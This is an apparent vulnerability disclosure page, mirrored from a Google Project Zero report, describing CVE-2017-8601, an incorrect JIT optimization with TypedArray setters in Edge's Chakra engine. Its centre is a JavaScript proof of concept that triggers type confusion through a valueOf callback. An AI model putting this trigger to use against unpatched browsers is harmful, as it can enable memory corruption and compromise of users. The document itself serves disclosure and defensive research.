Microsoft Edge Chakra Incorrect Jit Optimization

2017-08-1700:00:00

Google Security Research

packetstormsecurity.com

0.953 High

EPSS

Percentile

99.2%

JSON

`Microsoft Edge: Chakra: incorrect jit optimization with TypedArray setter #3  
  
CVE-2017-8601  
  
  
Coincidentally, Microsoft released the patch for the <a href="/p/project-zero/issues/detail?id=1290" title="Microsoft Edge: Chakra: incorrect jit optimization with TypedArray setter #2" class="closed_ref" rel="nofollow"> issue 1290 </a> the day after I reported it. But it seems they fixed it incorrectly again.  
  
This time, "func(a, b, i);" is replaced with "func(a, b, {});".  
  
PoC:  
'use strict';  
  
function func(a, b, c) {  
a[0] = 1.2;  
b[0] = c;  
a[1] = 2.2;  
a[0] = 2.3023e-320;  
}  
  
function main() {  
let a = [1.1, 2.2];  
let b = new Uint32Array(100);  
  
for (let i = 0; i < 0x1000; i++)  
func(a, b, {}); // <<---------- REPLACED  
  
func(a, b, {valueOf: () => {  
a[0] = {};  
  
return 0;  
}});  
  
a[0].toString();  
}  
  
main();  
  
Tested on Microsoft Edge 40.15063.0.0(Insider Preview).  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`